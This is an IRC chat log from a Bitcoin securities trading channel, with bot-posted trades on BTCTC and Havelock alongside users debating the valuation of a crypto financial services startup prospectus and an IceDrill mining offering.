[BTCTC] [BTCGARDEN] 777 @ 0.01553 = 12.0668 BTC [-] Aug 06 23:02:41 3 million for 20% valuation of 15 million dolars? Aug 06 23:02:58 VanCleef since you've read it make a summary ? Aug 06 23:03:12 for* Aug 06 23:03:22 same sort of valuation as btcgarden Aug 06 23:03:45 what's it do ? Aug 06 23:04:07 it looks pretty good Aug 06 23:04:34 providing fiduciary financial services Aug 06 23:05:23 need to read it a few times and research but yeah over valued ofcourse Aug 06 23:05:24 mircea_popescu: financial service business catering towards crypto-currency users/exchanges Aug 06 23:05:26 Jesus Christ - take 5 minutes and read it yourself. Aug 06 23:05:59 Urushiol i cnat raed. Aug 06 23:06:08 is this company worth 15 million dollars today? Aug 06 23:07:43 this company own any bitcoins at the moment or have any clients/customers/sales? Aug 06 23:09:52 [BTCTC] [ACTIVEMINING] 257 @ 0.005988 = 1.5389 BTC [-] Aug 06 23:10:18 VanCleef: no, startup Aug 06 23:10:43 It would fill a big gap, that's for sure. Aug 06 23:10:54 how is a startup worth 19 million dollars tho? Aug 06 23:11:02 maybe.....maybe 100g's Aug 06 23:11:23 startup = idea Aug 06 23:11:40 they certainly could start small. and they should Aug 06 23:11:41 an idea is not worth more than 1grand Aug 06 23:11:44 100k of capital isn't going to get you far Aug 06 23:13:11 i could do that business for 100g's in india Aug 06 23:13:18 probably less Aug 06 23:14:32 the problem is, you cant start small Aug 06 23:14:36 when you are essentially starting your own bank Aug 06 23:14:51 there's a ton of regulatory/paperwork to do Aug 06 23:14:55 that is going to cost hundreds of thousands Aug 06 23:14:59 if not more Aug 06 23:15:15 true, must be such a good idea and these guys are willing to sell their houses and stuff yeh? Aug 06 23:15:18 so to "start small" is not really an option Aug 06 23:15:24 or just want us to take on all the risk? Aug 06 23:15:36 they are still taking 80% of the risk Aug 06 23:15:39 remember Aug 06 23:15:45 with what money? Aug 06 23:15:53 are they putting in money as well? Aug 06 23:15:57 their own money, and their own private investors Aug 06 23:15:57 or just us Aug 06 23:16:10 the funds we raise wont even come close to coverign their expenses Aug 06 23:16:17 read the prospectus Aug 06 23:16:19 . Aug 06 23:16:22 RTFM! Aug 06 23:16:23 :p Aug 06 23:16:26 i am, didn't see that part :) Aug 06 23:16:29 [BTCTC] [ASICMINER-PT] 1 @ 3.969 BTC [-] Aug 06 23:16:30 [BTCTC] [ASICMINER-PT] 1 @ 3.968 BTC [-] Aug 06 23:16:31 how much are these guys putting in? Aug 06 23:16:34 the prosepctus, not the overview Aug 06 23:16:51 [BTCTC] [KENILWORTH] 10 @ 0.0017 = 0.017 BTC [-] Aug 06 23:18:02 [BTCTC] [KENILWORTH] 2 @ 0.00167 = 0.0033 BTC [-] Aug 06 23:18:31 [BTCTC] [KENILWORTH] 14 @ 0.00166 = 0.0232 BTC [-] Aug 06 23:19:11 [BTCTC] [KENILWORTH] 14 @ 0.001656 = 0.0232 BTC [-] Aug 06 23:19:25 [MPEX] [S.MPOE] 9450 @ 0.00082922 = 7.8361 BTC [+] Aug 06 23:19:59 fair enough read it again, not really seeing the part where it shows how much these guys currently own in assets and funds and how much they have put into this project already Aug 06 23:20:41 but i will keep reading Aug 06 23:21:54 VanCleef: ahh the prospectus might still be short some numbers.. i thoguht they were there.. Aug 06 23:22:08 their full business plan is 100+ pages Aug 06 23:22:19 but thats not being released to the public (yet at least) Aug 06 23:22:21 topace: found a typo in the prospectus. It refers to havelockinvestment.com (rather than havelockinvestmentS.com Aug 06 23:22:23 ) Aug 06 23:22:40 Urushiol: ack!! thanks Aug 06 23:22:44 small detail, sure, but perhaps an important one depending on the reader Aug 06 23:23:23 no worries Aug 06 23:23:34 so i guess this is valued same sort of price as btcgarden Aug 06 23:23:38 Urushiol: that was actually a phishing site Aug 06 23:23:44 so im removing the pdf Aug 06 23:23:48 until we get a new one Aug 06 23:23:48 lol Aug 06 23:23:49 grr Aug 06 23:23:59 so i guess, investors have to ask themselves if they think this is worth more or less than btcgarden atm Aug 06 23:24:16 me personally i would rather invest in this than btcgarden Aug 06 23:24:35 one of the biggest issues right now is the ability / freedom to get fiat into and out of bitcoin Aug 06 23:24:41 it's pretty much a huge pain in the ass Aug 06 23:24:53 investors need mroe than 20% tho Aug 06 23:25:03 at least 50% Aug 06 23:25:20 giving you a valuation of 6 million Aug 06 23:25:25 which is still very extreme Aug 06 23:25:39 in the banking industry, $6m is chump change Aug 06 23:26:02 [HAVELOCK] [XBOND] 1 @ 0.001039 BTC [-] Aug 06 23:26:25 http://ia800904.us.archive.org/35/items/gov.uscourts.txed.146063/gov.uscourts.txed.146063.4.6.pdf Aug 06 23:26:57 do they have a plan to not end up like liberty reserve? Aug 06 23:26:59 topace: is it correct to write every catch word in uppercase? Aug 06 23:27:07 i have no idea, just asking Aug 06 23:27:50 Pirate40 top expenses - Day spas Aug 06 23:27:54 LOL Aug 06 23:27:57 lol Aug 06 23:28:15 I guess he has to get a nice pedicure Aug 06 23:28:22 [BTCTC] [ACTIVEMINING] 21 @ 0.006063 = 0.1273 BTC [+] Aug 06 23:28:23 [BTCTC] [ACTIVEMINING] 68 @ 0.006064 = 0.4124 BTC [+] Aug 06 23:28:24 [BTCTC] [ACTIVEMINING] 50 @ 0.006065 = 0.3033 BTC [+] Aug 06 23:28:25 [BTCTC] [ACTIVEMINING] 4 @ 0.006069 = 0.0243 BTC [+] Aug 06 23:28:27 [BTCTC] [ACTIVEMINING] 52 @ 0.00607 = 0.3156 BTC [+] Aug 06 23:28:42 think he's bleeching his ahole hairs atm getting ready for jail Aug 06 23:28:46 [HAVELOCK] [XBOND] 18 @ 0.00103501 = 0.0186 BTC [-] Aug 06 23:28:54 Nice and smooth Aug 06 23:28:56 [BTCTC] [ACTIVEMINING] 16 @ 0.006069 = 0.0971 BTC [-] Aug 06 23:29:17 [HAVELOCK] [XBOND] 1 @ 0.001035 BTC [-] Aug 06 23:29:31 [HAVELOCK] [XBOND] 1 @ 0.001035 BTC [-] Aug 06 23:29:38 [BTCTC] [ACTIVEMINING] 52 @ 0.006069 = 0.3156 BTC [-] Aug 06 23:29:39 [BTCTC] [ACTIVEMINING] 16 @ 0.00607 = 0.0971 BTC [+] Aug 06 23:29:50 [BTCTC] [BTCGARDEN] 28 @ 0.01553 = 0.4348 BTC [-] Aug 06 23:29:51 [BTCTC] [BTCGARDEN] 210 @ 0.01552 = 3.2592 BTC [-] Aug 06 23:29:53 [BTCTC] [BTCGARDEN] 1000 @ 0.01552 = 15.52 BTC [-] Aug 06 23:29:54 [BTCTC] [BTCGARDEN] 1000 @ 0.01551 = 15.51 BTC [-] Aug 06 23:29:55 [BTCTC] [BTCGARDEN] 723 @ 0.01551 = 11.2137 BTC [-] Aug 06 23:30:19 tltr: you want to open an offshore exchange with debit card? Aug 06 23:30:23 [BTCTC] [ACTIVEMINING] 18 @ 0.006097 = 0.1097 BTC [+] Aug 06 23:30:36 what i miss: what are you doing with the ipo funds? Aug 06 23:30:57 preordering bfl Aug 06 23:31:40 Why Panama, out of curiosity? Aug 06 23:32:01 thats where they owners are localted Aug 06 23:32:04 located Aug 06 23:32:25 A man. A Plan. A Canal - Panama. Aug 06 23:32:26 ;) Aug 06 23:32:28 do you have another businessplan to read or something? Aug 06 23:33:05 Palindromes, yay! Aug 06 23:35:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0403 BTC [+] Aug 06 23:36:04 100k of capital isn't going to get you far << you're confused. Aug 06 23:36:12 it's not the case this is an ipo, such as for instance s.mg ipo'd. Aug 06 23:36:25 it's a sale by owner, in which case, the owner is presuming his thing is worth X. Aug 06 23:36:54 nothing wrong with it, if for instance erik presumes bitcoin's main transaction generator is worth 300k btc. Aug 06 23:37:06 everything's wrong with it if nobody on a stick presumes his nothing at all is worth > 1 btc. Aug 06 23:37:36 like to know mp's thoughts on this 15 million valuation Aug 06 23:38:36 seems way high but maybe that's the new norm Aug 06 23:38:36 VanCleef i'll sell you some. Aug 06 23:39:08 i want to get some shares haha, but just too high Aug 06 23:39:16 buy from me, 10% off. Aug 06 23:39:47 i mean the ipo Aug 06 23:39:51 [HAVELOCK] [SDSTM] 2 @ 0.00580001 = 0.0116 BTC [-] Aug 06 23:40:00 not teh game, sorry Aug 06 23:40:06 i meant the ipo too. Aug 06 23:40:25 10% off would be sweet :P Aug 06 23:41:55 [HAVELOCK] [SDSTM] 2 @ 0.0057 = 0.0114 BTC [-] Aug 06 23:42:28 [BTCTC] [BTC-BOND] 60 @ 0.009999 = 0.5999 BTC [+] Aug 06 23:44:56 [BTCTC] [BTC-TRADING-PT] 5 @ 0.7897 = 3.9485 BTC [+] Aug 06 23:45:21 topace are you with havelock? Aug 06 23:46:13 [HAVELOCK] [SDSTM] 1 @ 0.00561 BTC [-] Aug 06 23:46:16 [BTCTC] [ACTIVEMINING] 175 @ 0.006095 = 1.0666 BTC [-] Aug 06 23:47:49 Hiro2: yes Aug 06 23:48:04 [HAVELOCK] [SDSTM] 2 @ 0.00561 = 0.0112 BTC [-] Aug 06 23:51:08 there are few typos on the document... Aug 06 23:51:30 [BTCTC] [ASICMINER-PT] 1 @ 4.025 BTC [+] Aug 06 23:52:14 [BTCTC] [BTC-BOND] 5 @ 0.009991 = 0.05 BTC [-] Aug 06 23:53:27 [HAVELOCK] [SDSTM] 3 @ 0.00561 = 0.0168 BTC [-] Aug 06 23:56:22 [BTCTC] [COGNITIVE] 1 @ 0.3902 BTC [-] Aug 06 23:58:09 [BTCTC] [KENILWORTH] 1 @ 0.001656 BTC [-] Aug 06 23:58:32 [BTCTC] [KENILWORTH] 4 @ 0.001656 = 0.0066 BTC [-] Aug 06 23:58:45 [BTCTC] [KENILWORTH] 2 @ 0.001656 = 0.0033 BTC [-] Aug 06 23:58:58 [BTCTC] [KENILWORTH] 1 @ 0.001656 BTC [-] Aug 06 23:59:10 [BTCTC] [KENILWORTH] 1 @ 0.001656 BTC [-] Aug 06 23:59:49 [BTCTC] [KENILWORTH] 3 @ 0.001656 = 0.005 BTC [-] Aug 07 00:02:13 [BTCTC] [LABCOIN] 16 @ 0.001598 = 0.0256 BTC [-] Aug 07 00:02:32 [BTCTC] [ACTIVEMINING] 1 @ 0.006089 BTC [-] Aug 07 00:04:33 [BTCTC] [LABCOIN] 1 @ 0.001598 BTC [-] Aug 07 00:08:32 [BTCTC] [DMS.MINING] 5 @ 0.0065 = 0.0325 BTC [-] Aug 07 00:10:40 [BTCTC] [DMS.MINING] 2 @ 0.006649 = 0.0133 BTC [+] Aug 07 00:11:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002525 BTC [+] Aug 07 00:12:39 [HAVELOCK] [XBOND] 10 @ 0.001035 = 0.0104 BTC [-] Aug 07 00:13:53 [HAVELOCK] [XBOND] 960 @ 0.001033 = 0.9917 BTC [-] Aug 07 00:14:09 [HAVELOCK] [XBOND] 400 @ 0.00103213 = 0.4129 BTC [-] Aug 07 00:14:15 [HAVELOCK] [XBOND] 1890 @ 0.00103212 = 1.9507 BTC [-] Aug 07 00:14:18 [BTCTC] [DMS.SELLING] 6 @ 0.02319 = 0.1391 BTC [-] Aug 07 00:14:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0025 BTC [-] Aug 07 00:15:20 [HAVELOCK] [XBOND] 11740 @ 0.0010301 = 12.0934 BTC [-] Aug 07 00:16:12 [BTCTC] [DMS.PURCHASE] 7 @ 0.02814 = 0.197 BTC [-] Aug 07 00:17:15 [BTCTC] [DMS.PURCHASE] 26 @ 0.02813 = 0.7314 BTC [-] Aug 07 00:17:36 [BTCTC] [DMS.PURCHASE] 7 @ 0.02811 = 0.1968 BTC [-] Aug 07 00:20:21 [HAVELOCK] [AM100] 5 @ 0.03810002 = 0.1905 BTC [-] Aug 07 00:20:28 [HAVELOCK] [AM100] 10 @ 0.03807 = 0.3807 BTC [-] Aug 07 00:20:33 [BTCTC] [LABCOIN] 1 @ 0.001598 BTC [-] Aug 07 00:20:35 [HAVELOCK] [AM100] 61 @ 0.03806 = 2.3217 BTC [-] Aug 07 00:21:29 [BTCTC] [COGNITIVE] 1 @ 0.3901 BTC [-] Aug 07 00:23:08 [BTCTC] [KENILWORTH] 12 @ 0.001656 = 0.0199 BTC [-] Aug 07 00:23:31 [BTCTC] [BASIC-MINING] 1 @ 0.4129 BTC [+] Aug 07 00:25:42 [BTCTC] [LABCOIN] 12 @ 0.001598 = 0.0192 BTC [-] Aug 07 00:29:24 [BTCTC] [LABCOIN] 2 @ 0.001596 = 0.0032 BTC [-] Aug 07 00:30:58 [BTCTC] [ASICMINER-PT] 24 @ 4 = 96 BTC [-] Aug 07 00:32:41 [BTCTC] [BFMINES] 40 @ 0.003985 = 0.1594 BTC [+] Aug 07 00:33:07 !ticker btctc dms.selling Aug 07 00:33:08 [BTCT:DMS.SELLING] 1D: 0.02176 / 0.02298 / 0.02399 (2107 shares, 48.4 BTC), 7D: 0.0201 / 0.02253 / 0.0264 (17566 shares, 395.7 BTC), 30D: 0.0176 / 0.02404 / 0.035716 (59750 shares, 1436.6 BTC) Aug 07 00:33:35 [BTCTC] [BTCGARDEN] 10 @ 0.01595 = 0.1595 BTC [+] Aug 07 00:37:56 JOOL TO MAJOR JEB Aug 07 00:41:34 [BTCTC] [LABCOIN] 1 @ 0.00157 BTC [-] Aug 07 00:41:35 [BTCTC] [LABCOIN] 2317 @ 0.001553 = 3.5983 BTC [-] Aug 07 00:41:36 [BTCTC] [LABCOIN] 10000 @ 0.001552 = 15.52 BTC [-] Aug 07 00:41:37 [BTCTC] [LABCOIN] 103 @ 0.00155 = 0.1597 BTC [-] Aug 07 00:41:38 [BTCTC] [LABCOIN] 6500 @ 0.00155 = 10.075 BTC [-] Aug 07 00:41:40 [BTCTC] [LABCOIN] 1079 @ 0.00155 = 1.6725 BTC [-] Aug 07 00:41:58 Ground control to major mircea_popescu Aug 07 00:42:06 [BTCTC] [LABCOIN] 1 @ 0.001594 BTC [+] Aug 07 00:42:26 [HAVELOCK] [AM100] 10 @ 0.0381 = 0.381 BTC [+] Aug 07 00:42:28 [HAVELOCK] [AM100] 59 @ 0.03806 = 2.2455 BTC [-] Aug 07 00:42:31 [HAVELOCK] [AM100] 1 @ 0.0380001 BTC [-] Aug 07 00:42:33 [HAVELOCK] [AM100] 3 @ 0.03800001 = 0.114 BTC [-] Aug 07 00:42:35 [HAVELOCK] [AM100] 175 @ 0.038 = 6.65 BTC [-] Aug 07 00:43:44 [HAVELOCK] [XBOND] 1 @ 0.001039 BTC [+] Aug 07 00:45:14 There isn't enough coffee in this place to keep me awake Aug 07 00:46:47 zzzzZzzzzzZ Aug 07 00:47:39 [HAVELOCK] [XBOND] 1 @ 0.0010301 BTC [-] Aug 07 00:50:36 [BTCTC] [BITVPS] 2 @ 0.0022 = 0.0044 BTC [-] Aug 07 00:56:02 [BTCTC] [LTC-ATF.B2] 3 @ 0.01043 = 0.0313 BTC [+] Aug 07 00:57:36 [BTCTC] [BTCGARDEN] 1000 @ 0.01553 = 15.53 BTC [-] Aug 07 00:57:37 [BTCTC] [BTCGARDEN] 1000 @ 0.01551 = 15.51 BTC [-] Aug 07 00:59:17 [BTCTC] [BTCGARDEN] 10 @ 0.01553 = 0.1553 BTC [+] Aug 07 00:59:18 [BTCTC] [BTCGARDEN] 368 @ 0.01551 = 5.7077 BTC [-] Aug 07 00:59:20 [BTCTC] [BTCGARDEN] 7 @ 0.01551 = 0.1086 BTC [-] Aug 07 00:59:21 [BTCTC] [BTCGARDEN] 680 @ 0.0155 = 10.54 BTC [-] Aug 07 01:02:24 [HAVELOCK] [XBOND] 4644 @ 0.001039 = 4.8251 BTC [+] Aug 07 01:02:27 [BTCTC] [BTCGARDEN] 28 @ 0.01586 = 0.4441 BTC [+] Aug 07 01:02:29 [BTCTC] [BTCGARDEN] 7 @ 0.01597 = 0.1118 BTC [+] Aug 07 01:02:38 [HAVELOCK] [XBOND] 2 @ 0.001039 = 0.0021 BTC [+] Aug 07 01:05:22 what is meant by "Fiduciary Financial Services" Aug 07 01:05:41 when asking google it resulted in pages full of unrelated spam insurance sites Aug 07 01:05:57 FFS tells me enough lol Aug 07 01:06:03 then it mean nothing Aug 07 01:06:13 garbage Aug 07 01:06:39 it does sound catchy though Aug 07 01:06:42 [HAVELOCK] [XBOND] 100 @ 0.001039 = 0.1039 BTC [+] Aug 07 01:06:57 the word "Fiduciary" somehow reminds me of bird feathers though Aug 07 01:07:10 there is fiduciary duty Aug 07 01:07:39 [BTCTC] [ACTIVEMINING] 3 @ 0.005938 = 0.0178 BTC [-] Aug 07 01:07:42 http://dcx.smidge.com/media/composition_w_price.jpg Aug 07 01:07:50 so like half of the DCX index is scam Aug 07 01:07:53 or something Aug 07 01:07:55 lol Aug 07 01:09:10 [HAVELOCK] [AM100] 10 @ 0.0396 = 0.396 BTC [+] Aug 07 01:10:03 [HAVELOCK] [AM100] 10 @ 0.0399 = 0.399 BTC [+] Aug 07 01:10:20 kako, you are good wif maffs, I am trying to make sense of the DeadTerra Icedrill Aug 07 01:10:32 one sec and I will post up my ? Aug 07 01:11:50 [MPEX] [S.MPOE] 6750 @ 0.00082976 = 5.6009 BTC [+] Aug 07 01:12:10 so, basically trying to raise 42 million? Aug 07 01:16:45 basically they wanna be big miners and want shareholders to assume all the risk Aug 07 01:16:52 nothing new Aug 07 01:17:30 I am just trying to figure out the math, I got the idea Aug 07 01:18:22 [HAVELOCK] [AM1] 1 @ 4 BTC [-] Aug 07 01:18:28 [HAVELOCK] [AM100] 7 @ 0.0380001 = 0.266 BTC [-] Aug 07 01:18:30 [HAVELOCK] [AM100] 93 @ 0.038 = 3.534 BTC [-] Aug 07 01:18:31 basically Aug 07 01:18:55 icedrill gets 40% of income Aug 07 01:19:08 and can issue new shares anytime Aug 07 01:21:29 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1935 = 0.387 BTC [+] Aug 07 01:26:07 the starting diff is already off in his google docs Aug 07 01:26:11 [BTCTC] [ACTIVEMINING] 68 @ 0.005945 = 0.4043 BTC [+] Aug 07 01:26:29 it is going to be 50m next week or sooner Aug 07 01:26:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005944 = 0.2972 BTC [-] Aug 07 01:28:18 Please note that DigiMex will be operated by PetaMex in the foreseeable future. However, the operators (PetaMex in this case) retains the right to stop Digimex Aug 07 01:28:46 Each share represents 1/50,000,000 of the profit of DigiMex Aug 07 01:29:11 mircea should have a field day with this Aug 07 01:29:37 [BTCTC] [ACTIVEMINING] 20 @ 0.006043 = 0.1209 BTC [+] Aug 07 01:31:23 The shares have no voting power. Shares of IceDrill.ASIC on BitFunder do not represent real world shares of DigiMex Aug 07 01:38:33 IPO is up Aug 07 01:38:37 no buyers? Aug 07 01:39:33 [BTCTC] [LABCOIN] 12 @ 0.001589 = 0.0191 BTC [-] Aug 07 01:40:00 [BTCTC] [LABCOIN] 1 @ 0.00159 BTC [+] Aug 07 01:40:01 [BTCTC] [LABCOIN] 100 @ 0.00159 = 0.159 BTC [+] Aug 07 01:40:35 [BTCTC] [LABCOIN] 2 @ 0.001592 = 0.0032 BTC [+] Aug 07 01:40:45 ThickAsThieves: is it a PMB? Aug 07 01:41:00 [BTCTC] [LABCOIN] 20 @ 0.001593 = 0.0319 BTC [+] Aug 07 01:41:22 [BTCTC] [LABCOIN] 6 @ 0.001594 = 0.0096 BTC [+] Aug 07 01:41:46 [BTCTC] [LABCOIN] 50 @ 0.001595 = 0.0798 BTC [+] Aug 07 01:41:54 [HAVELOCK] [SMG] 4 @ 0.0002396 = 0.001 BTC [-] Aug 07 01:43:13 [BTCTC] [ASICMINER-PT] 1 @ 4.024 BTC [+] Aug 07 01:43:14 [BTCTC] [ASICMINER-PT] 2 @ 4.025 = 8.05 BTC [+] Aug 07 01:43:16 [BTCTC] [ASICMINER-PT] 1 @ 4.039 BTC [+] Aug 07 01:43:18 [BTCTC] [ASICMINER-PT] 2 @ 4.039 = 8.078 BTC [+] Aug 07 01:43:24 [BTCTC] [ASICMINER-PT] 4 @ 4.04 = 16.16 BTC [+] Aug 07 01:43:42 [BTCTC] [LABCOIN] 312 @ 0.001599 = 0.4989 BTC [+] Aug 07 01:44:41 [BTCTC] [LABCOIN] 77 @ 0.001599 = 0.1231 BTC [+] Aug 07 01:44:45 not exactly Aug 07 01:45:51 40% goes to issuer, 25% what's left goes to reinvestment, the rest goes to shareholder Aug 07 01:46:07 what Aug 07 01:46:10 what is icedrill Aug 07 01:46:22 DT's new miniing operation Aug 07 01:46:47 that dude is unserious Aug 07 01:48:14 hmm, I'm a bit weary about this at the moment. Aug 07 01:48:40 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 07 01:49:29 [HAVELOCK] [LABCO] 10 @ 0.00187 = 0.0187 BTC [+] Aug 07 01:52:25 [BTCTC] [ACTIVEMINING] 67 @ 0.005914 = 0.3962 BTC [-] Aug 07 01:53:41 nothing moving today Aug 07 01:53:58 slow day Aug 07 01:54:10 Move, Zig Aug 07 01:55:12 need some more wsj fuckups Aug 07 01:55:18 get shit movin around here Aug 07 01:56:00 [HAVELOCK] [LABCO] 15 @ 0.00187 = 0.0281 BTC [+] Aug 07 01:56:28 [BTCTC] [ASICMINER-PT] 6 @ 4 = 24 BTC [-] Aug 07 02:00:50 !last h xbond Aug 07 02:00:51 Last trade for XBOND on HAVELOCK was at 0.001039 BTC [+] Aug 07 02:01:27 [BTCTC] [ASICMINER-PT] 1 @ 4.03 BTC [+] Aug 07 02:05:08 [HAVELOCK] [AM100] 1 @ 0.0382 BTC [+] Aug 07 02:06:11 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [-] Aug 07 02:06:42 [HAVELOCK] [AM100] 5 @ 0.0381 = 0.1905 BTC [-] Aug 07 02:07:08 [BTCTC] [LABCOIN] 1 @ 0.001598 BTC [-] Aug 07 02:07:19 hows XBOND sales Aug 07 02:15:32 just read the crypto financials prospectus Aug 07 02:15:37 sounds very cool Aug 07 02:16:04 https://www.havelockinvestments.com/reports.php Aug 07 02:16:09 not sure though Aug 07 02:17:23 [BTCTC] [BITVPS] 16 @ 0.002162 = 0.0346 BTC [-] Aug 07 02:18:08 [BTCTC] [BTCGARDEN] 45 @ 0.01601 = 0.7205 BTC [+] Aug 07 02:20:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0403 = 0.1209 BTC [+] Aug 07 02:20:46 [BTCTC] [ACTIVEMINING] 2 @ 0.005984 = 0.012 BTC [+] Aug 07 02:23:05 ;;ticker Aug 07 02:23:05 MtGox BTCUSD ticker | Best bid: 106.05032, Best ask: 106.87769, Bid-ask spread: 0.82737, Last trade: 106.87919, 24 hour volume: 12299.89308485, 24 hour low: 105.11111, 24 hour high: 107.50000, 24 hour vwap: 106.34017 Aug 07 02:23:30 !ticker btctc dms.selling Aug 07 02:23:32 [BTCT:DMS.SELLING] 1D: 0.02176 / 0.023 / 0.02399 (2064 shares, 47.5 BTC), 7D: 0.0201 / 0.02253 / 0.0264 (17564 shares, 395.7 BTC), 30D: 0.0176 / 0.02404 / 0.035716 (59738 shares, 1436.2 BTC) Aug 07 02:26:21 [BTCTC] [ASICMINER-PT] 8 @ 4.001 = 32.008 BTC [-] Aug 07 02:26:23 [BTCTC] [ASICMINER-PT] 11 @ 4 = 44 BTC [-] Aug 07 02:29:54 [BTCTC] [ASICMINER-PT] 4 @ 4 = 16 BTC [-] Aug 07 02:30:55 [HAVELOCK] [XBOND] 1 @ 0.001039 BTC [+] Aug 07 02:31:46 [BTCTC] [BTCGARDEN] 52 @ 0.01601 = 0.8325 BTC [+] Aug 07 02:33:04 [BTCTC] [BTCGARDEN] 28 @ 0.016 = 0.448 BTC [-] Aug 07 02:33:38 [BTCTC] [BTCGARDEN] 15 @ 0.01599 = 0.2399 BTC [-] Aug 07 02:34:16 [BTCTC] [BTCGARDEN] 13 @ 0.01599 = 0.2079 BTC [-] Aug 07 02:34:17 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 07 02:35:22 [BTCTC] [BTCGARDEN] 28 @ 0.01601 = 0.4483 BTC [+] Aug 07 02:35:22 [BTCTC] [BTCGARDEN] 36 @ 0.01601 = 0.5764 BTC [+] Aug 07 02:36:38 [BTCTC] [DMS.MINING] 30 @ 0.00661 = 0.1983 BTC [-] Aug 07 02:36:39 [BTCTC] [DMS.MINING] 2 @ 0.006615 = 0.0132 BTC [+] Aug 07 02:37:24 [BTCTC] [BTCGARDEN] 40 @ 0.01601 = 0.6404 BTC [+] Aug 07 02:39:23 [BTCTC] [BTCGARDEN] 40 @ 0.01601 = 0.6404 BTC [+] Aug 07 02:40:28 [BTCTC] [LABCOIN] 235 @ 0.001568 = 0.3685 BTC [-] Aug 07 02:40:30 [BTCTC] [LABCOIN] 50 @ 0.001567 = 0.0784 BTC [-] Aug 07 02:40:31 [BTCTC] [LABCOIN] 38 @ 0.001556 = 0.0591 BTC [-] Aug 07 02:40:32 [BTCTC] [LABCOIN] 30 @ 0.001554 = 0.0466 BTC [-] Aug 07 02:40:34 [BTCTC] [LABCOIN] 23 @ 0.001552 = 0.0357 BTC [-] Aug 07 02:40:35 [BTCTC] [LABCOIN] 731 @ 0.00155 = 1.1331 BTC [-] Aug 07 02:40:35 [BTCTC] [LABCOIN] 1 @ 0.00155 BTC [-] Aug 07 02:40:36 [BTCTC] [LABCOIN] 26 @ 0.00155 = 0.0403 BTC [-] Aug 07 02:40:37 [BTCTC] [LABCOIN] 78 @ 0.00155 = 0.1209 BTC [-] Aug 07 02:40:38 [BTCTC] [LABCOIN] 125 @ 0.001535 = 0.1919 BTC [-] Aug 07 02:40:39 [BTCTC] [LABCOIN] 1000 @ 0.001534 = 1.534 BTC [-] Aug 07 02:40:40 [BTCTC] [LABCOIN] 625 @ 0.001531 = 0.9569 BTC [-] Aug 07 02:40:42 [BTCTC] [LABCOIN] 5000 @ 0.00153 = 7.65 BTC [-] Aug 07 02:40:43 [BTCTC] [LABCOIN] 168 @ 0.001529 = 0.2569 BTC [-] Aug 07 02:40:44 [BTCTC] [LABCOIN] 1350 @ 0.001528 = 2.0628 BTC [-] Aug 07 02:40:45 [BTCTC] [LABCOIN] 6 @ 0.001523 = 0.0091 BTC [-] Aug 07 02:40:45 [BTCTC] [LABCOIN] 50 @ 0.001522 = 0.0761 BTC [-] Aug 07 02:40:46 [BTCTC] [LABCOIN] 60 @ 0.001521 = 0.0913 BTC [-] Aug 07 02:40:47 [BTCTC] [LABCOIN] 280 @ 0.00152 = 0.4256 BTC [-] Aug 07 02:40:48 [BTCTC] [LABCOIN] 200 @ 0.001519 = 0.3038 BTC [-] Aug 07 02:40:49 [BTCTC] [LABCOIN] 2 @ 0.001517 = 0.003 BTC [-] Aug 07 02:40:50 [BTCTC] [LABCOIN] 625 @ 0.001517 = 0.9481 BTC [-] Aug 07 02:40:51 [BTCTC] [LABCOIN] 5000 @ 0.001516 = 7.58 BTC [-] Aug 07 02:40:52 [BTCTC] [LABCOIN] 335 @ 0.001513 = 0.5069 BTC [-] Aug 07 02:40:53 [BTCTC] [LABCOIN] 3300 @ 0.001512 = 4.9896 BTC [-] Aug 07 02:40:54 [BTCTC] [LABCOIN] 25 @ 0.001511 = 0.0378 BTC [-] Aug 07 02:40:55 [BTCTC] [LABCOIN] 6 @ 0.001508 = 0.009 BTC [-] Aug 07 02:40:56 <[1]lewicki> ruh roh Aug 07 02:40:57 [BTCTC] [LABCOIN] 50 @ 0.001507 = 0.0754 BTC [-] Aug 07 02:40:57 [BTCTC] [LABCOIN] 368 @ 0.001506 = 0.5542 BTC [-] Aug 07 02:40:58 [BTCTC] [LABCOIN] 2000 @ 0.001505 = 3.01 BTC [-] Aug 07 02:40:59 [BTCTC] [LABCOIN] 950 @ 0.001504 = 1.4288 BTC [-] Aug 07 02:41:00 [BTCTC] [LABCOIN] 283 @ 0.001503 = 0.4253 BTC [-] Aug 07 02:41:01 [BTCTC] [LABCOIN] 4000 @ 0.001502 = 6.008 BTC [-] Aug 07 02:41:02 [BTCTC] [LABCOIN] 1735 @ 0.001502 = 2.606 BTC [-] Aug 07 02:41:03 [BTCTC] [LABCOIN] 30 @ 0.001501 = 0.045 BTC [-] Aug 07 02:41:04 [BTCTC] [LABCOIN] 2000 @ 0.001501 = 3.002 BTC [-] Aug 07 02:41:05 [BTCTC] [LABCOIN] 5000 @ 0.0015 = 7.5 BTC [-] Aug 07 02:41:06 [BTCTC] [ACTIVEMINING] 68 @ 0.005954 = 0.4049 BTC [-] Aug 07 02:41:06 [BTCTC] [LABCOIN] 1500 @ 0.0015 = 2.25 BTC [-] Aug 07 02:41:07 [BTCTC] [LABCOIN] 2500 @ 0.0015 = 3.75 BTC [-] Aug 07 02:41:08 [BTCTC] [ACTIVEMINING] 50 @ 0.005954 = 0.2977 BTC [-] Aug 07 02:41:09 [BTCTC] [LABCOIN] 215 @ 0.0015 = 0.3225 BTC [-] Aug 07 02:41:10 [BTCTC] [ACTIVEMINING] 23 @ 0.005953 = 0.1369 BTC [-] Aug 07 02:41:11 [BTCTC] [ACTIVEMINING] 1 @ 0.005939 BTC [-] Aug 07 02:41:12 [BTCTC] [ACTIVEMINING] 8 @ 0.005938 = 0.0475 BTC [-] Aug 07 02:41:13 [BTCTC] [ACTIVEMINING] 14 @ 0.005907 = 0.0827 BTC [-] Aug 07 02:41:14 [BTCTC] [ACTIVEMINING] 3 @ 0.005906 = 0.0177 BTC [-] Aug 07 02:41:14 so we're selling then? Aug 07 02:41:15 [BTCTC] [ACTIVEMINING] 68 @ 0.005905 = 0.4015 BTC [-] Aug 07 02:41:16 [BTCTC] [ACTIVEMINING] 10 @ 0.005903 = 0.059 BTC [-] Aug 07 02:41:17 [BTCTC] [ACTIVEMINING] 50 @ 